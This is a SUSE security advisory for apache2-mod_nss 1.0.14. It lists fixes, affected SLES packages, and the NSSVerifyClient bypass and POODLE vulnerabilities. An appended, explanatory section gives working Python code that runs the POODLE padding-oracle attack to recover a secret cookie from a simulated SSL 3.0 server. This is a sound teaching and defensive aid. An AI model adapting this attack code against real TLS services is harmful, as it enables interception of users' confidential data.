SUSE-SU-2016:2329-1

Published: 16 Sep 2016
Source: suse-cvrf

Description

Security update for apache2-mod_nss

This update provides apache2-mod_nss 1.0.14, which brings several fixes and enhancements:

  • SHA256 cipher names change spelling from *_sha256 to *_sha_256.
  • Drop mod_nss_migrate.pl and use the upstream migrate script instead.
  • Check at startup that the Apache user has owner/group read permission on the NSS database.
  • Update the default ciphers to something more modern and secure.
  • Check that the host and netstat commands exist in gencert before trying to use them.
  • Don't ignore NSSProtocol when NSSFIPS is enabled.
  • Use proper shell syntax to avoid creating /0 in gencert.
  • Add server support for DHE ciphers.
  • Extract subjectAltName (SAN) values from server/client certificates into environment variables.
  • Fix memory leaks and other coding issues caught by the clang analyzer.
  • Add support for Server Name Indication (SNI).
  • Add support for SNI on reverse proxy connections.
  • Add the NSSRenegBufferSize option.
  • Add support for TLS Session Tickets (RFC 5077).
  • Implement more of the OpenSSL cipher macros.
  • Fix a number of illegal memory accesses and memory leaks.
  • Support SHA384 ciphers if they are available in the version of NSS mod_nss is built against.
  • Add the SECURE_RENEG environment variable.
  • Add some hints when the NSS database cannot be initialized.
  • Code cleanup, including trailing whitespace and compiler warnings.
  • Modernize the autotools configuration slightly, add config.h.
  • Add a small test suite for SNI.
  • Add compatibility for mod_ssl-style cipher definitions.
  • Add Camellia ciphers.
  • Remove Fortezza ciphers.
  • Add TLSv1.2-specific ciphers.
  • Initialize the cipher list when renegotiating the handshake.
  • Completely remove support for SSLv2.
  • Add support for sqlite NSS databases.
  • Compare the certificate subject CN with the virtual server (VS) hostname during server startup.
  • Add support for enabling TLS v1.2.
  • Don't enable SSL 3.0 by default (CVE-2014-3566, POODLE).
  • Improve protocol testing.
  • Add an nss_pcache man page.
  • Fix argument handling in nss_pcache.
  • Support httpd 2.4+.
  • Allow users to configure a helper that asks for certificate passphrases via NSSPassPhraseDialog. (bsc#975394)

Package list

SUSE Linux Enterprise Point of Sale 11 SP3: apache2-mod_nss-1.0.14-0.4.25.1
SUSE Linux Enterprise Server 11 SP2-LTSS: apache2-mod_nss-1.0.14-0.4.25.1
SUSE Linux Enterprise Server 11 SP3-LTSS: apache2-mod_nss-1.0.14-0.4.25.1
SUSE Linux Enterprise Server 11 SP3-TERADATA: apache2-mod_nss-1.0.14-0.4.25.1
SUSE Linux Enterprise Server 11 SP4: apache2-mod_nss-1.0.14-0.4.25.1
SUSE Linux Enterprise Server for SAP Applications 11 SP4: apache2-mod_nss-1.0.14-0.4.25.1
SUSE Manager 2.1: apache2-mod_nss-1.0.14-0.4.25.1
SUSE Manager Proxy 2.1: apache2-mod_nss-1.0.14-0.4.25.1
SUSE OpenStack Cloud 5: apache2-mod_nss-1.0.14-0.4.25.1

Referenced vulnerability: NSSVerifyClient directory-context bypass

mod_nss 1.0.8 and earlier, when NSSVerifyClient is set to none in the server/vhost context, does not enforce an NSSVerifyClient setting given in a directory context (for example NSSVerifyClient require inside a <Location> or <Directory> block), which allows remote attackers to bypass intended access restrictions. Deployments that rely on this pattern to protect specific paths with a client certificate are affected; with the fixed package, a request to such a path without a valid client certificate is rejected even though the vhost itself does not request one.

Affected products
SUSE Linux Enterprise Point of Sale 11 SP3: apache2-mod_nss-1.0.14-0.4.25.1
SUSE Linux Enterprise Server 11 SP2-LTSS: apache2-mod_nss-1.0.14-0.4.25.1
SUSE Linux Enterprise Server 11 SP3-LTSS: apache2-mod_nss-1.0.14-0.4.25.1
SUSE Linux Enterprise Server 11 SP3-TERADATA: apache2-mod_nss-1.0.14-0.4.25.1

Referenced vulnerability: POODLE (CVE-2014-3566)

The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other products, uses nondeterministic CBC padding (the receiver checks only the final padding-length byte, never the padding bytes themselves), which makes it easier for man-in-the-middle attackers to obtain cleartext data via a padding-oracle attack, aka the "POODLE" issue. Because the flaw is in the protocol rather than any one implementation, the only fix is to stop negotiating SSL 3.0, which is why this update no longer enables it by default.


Affected products
SUSE Linux Enterprise Point of Sale 11 SP3: apache2-mod_nss-1.0.14-0.4.25.1
SUSE Linux Enterprise Server 11 SP2-LTSS: apache2-mod_nss-1.0.14-0.4.25.1
SUSE Linux Enterprise Server 11 SP3-LTSS: apache2-mod_nss-1.0.14-0.4.25.1
SUSE Linux Enterprise Server 11 SP3-TERADATA: apache2-mod_nss-1.0.14-0.4.25.1
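To make the POODLE description above concrete, the following added example (not code from the advisory, from SUSE, or from mod_nss) models an SSL 3.0 style CBC record layer and runs the padding-oracle attack against it. Everything in it is constructed: the block cipher is a toy 4-round Feistel network over SHA-256 standing in for a real cipher, the MAC is HMAC-SHA256 instead of the SSL 3.0 MAC, and SECRET plays the role of a cookie the attacker's script cannot read. What is faithful is the padding rule the attack depends on: the receiver strips as many bytes as the last byte says and never checks the padding bytes themselves, so copying the ciphertext block that holds the target byte over the padding block gives an accepted record exactly when the target byte, masked by known ciphertext bytes, equals 15.

```python
"""Toy SSL 3.0 record layer (MAC-then-pad-then-CBC) and the POODLE padding-oracle attack on it.

Constructed example: toy Feistel block cipher, HMAC-SHA256 MAC; SSL 3.0 padding rules are the real ones.
"""
import hashlib
import hmac
import os
from typing import Optional

BLOCK = 16
MAC_LEN = 32


def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def _round_fn(key: bytes, rnd: int, half: bytes) -> bytes:
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:8]


def toy_block_encrypt(key: bytes, block: bytes) -> bytes:
    """Keyed 16-byte permutation (toy Feistel); the attack never looks inside it."""
    left, right = block[:8], block[8:]
    for rnd in range(4):
        left, right = right, _xor(left, _round_fn(key, rnd, right))
    return left + right


def toy_block_decrypt(key: bytes, block: bytes) -> bytes:
    left, right = block[:8], block[8:]
    for rnd in reversed(range(4)):
        left, right = _xor(right, _round_fn(key, rnd, left)), left
    return left + right


def cbc_encrypt(key: bytes, iv: bytes, data: bytes) -> bytes:
    out, prev = [], iv
    for i in range(0, len(data), BLOCK):
        prev = toy_block_encrypt(key, _xor(data[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)


def cbc_decrypt(key: bytes, iv: bytes, data: bytes) -> bytes:
    out, prev = [], iv
    for i in range(0, len(data), BLOCK):
        blk = data[i:i + BLOCK]
        out.append(_xor(toy_block_decrypt(key, blk), prev))
        prev = blk
    return b"".join(out)


def ssl3_seal(enc_key: bytes, mac_key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """MAC, pad to the block size, CBC-encrypt. Only the final byte (pad length) carries meaning."""
    mac = hmac.new(mac_key, plaintext, hashlib.sha256).digest()
    pad_len = (BLOCK - (len(plaintext) + MAC_LEN + 1) % BLOCK) % BLOCK
    padding = os.urandom(pad_len) + bytes([pad_len])      # pad bytes are arbitrary in SSL 3.0
    return cbc_encrypt(enc_key, iv, plaintext + mac + padding)


def ssl3_open(enc_key: bytes, mac_key: bytes, iv: bytes, ciphertext: bytes) -> Optional[bytes]:
    """Receiver: plaintext, or None on bad pad length / MAC. That accept/reject answer is the oracle."""
    if not ciphertext or len(ciphertext) % BLOCK:
        return None
    data = cbc_decrypt(enc_key, iv, ciphertext)
    pad_len = data[-1]
    if pad_len >= BLOCK or pad_len + 1 + MAC_LEN > len(data):
        return None
    body = data[:len(data) - pad_len - 1]                 # padding bytes themselves are never checked
    plaintext, mac = body[:-MAC_LEN], body[-MAC_LEN:]
    expected = hmac.new(mac_key, plaintext, hashlib.sha256).digest()
    return plaintext if hmac.compare_digest(mac, expected) else None


def make_victim(enc_key: bytes, mac_key: bytes, secret: bytes):
    """Models the browser: attacker-chosen path (prefix) and body (suffix) around a secret cookie,
    each request encrypted with a fresh IV."""
    def send(prefix_len: int, suffix_len: int):
        iv = os.urandom(BLOCK)
        request = b"A" * prefix_len + secret + b"B" * suffix_len
        return iv, ssl3_seal(enc_key, mac_key, iv, request)
    return send


def poodle_recover(victim, server_accepts, secret_len: int, max_trials: int = 100_000) -> bytes:
    """Recovers the secret at roughly 256 requests per byte using only accept/reject answers."""
    recovered = bytearray()
    for j in range(secret_len):
        prefix_len = (BLOCK - 1 - j) % BLOCK                          # secret[j] ends a block
        suffix_len = (-(prefix_len + secret_len + MAC_LEN)) % BLOCK   # plaintext+MAC block-aligned,
        target = (prefix_len + j) // BLOCK                            # so the last block is pure padding
        for _ in range(max_trials):
            iv, ct = victim(prefix_len, suffix_len)
            blocks = [iv] + [ct[i:i + BLOCK] for i in range(0, len(ct), BLOCK)]   # blocks[k+1] == C_k
            forged = ct[:-BLOCK] + blocks[target + 1]                 # padding block := C_target
            if server_accepts(iv, forged):
                # accepted iff P_target[15] ^ C_{target-1}[15] ^ C_{n-1}[15] == 15
                recovered.append((BLOCK - 1) ^ blocks[target][15] ^ blocks[-2][15])
                break
        else:
            raise RuntimeError("oracle never accepted a forged record")
    return bytes(recovered)


SECRET = b"SID=c0ffee"   # constructed: the cookie the attacker wants to read


def demo(secret: bytes = SECRET) -> bytes:
    enc_key, mac_key = os.urandom(16), os.urandom(16)
    victim = make_victim(enc_key, mac_key, secret)
    server_accepts = lambda iv, ct: ssl3_open(enc_key, mac_key, iv, ct) is not None
    return poodle_recover(victim, server_accepts, len(secret))


if __name__ == "__main__":
    print(demo())
```

Running demo() recovers SECRET byte by byte. The attacker needs two things a real POODLE attacker also has: the ability to make the victim resend the secret with a chosen prefix and suffix length (so each byte lands at the end of a block and the record ends in a full padding block), and a server that reveals whether a record was accepted. Nothing about the cipher or the MAC is exploited; the leak comes entirely from SSL 3.0 trusting an unauthenticated length byte, which is why disabling SSL 3.0 (as this update does by default) is the remedy rather than any cipher-suite change.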
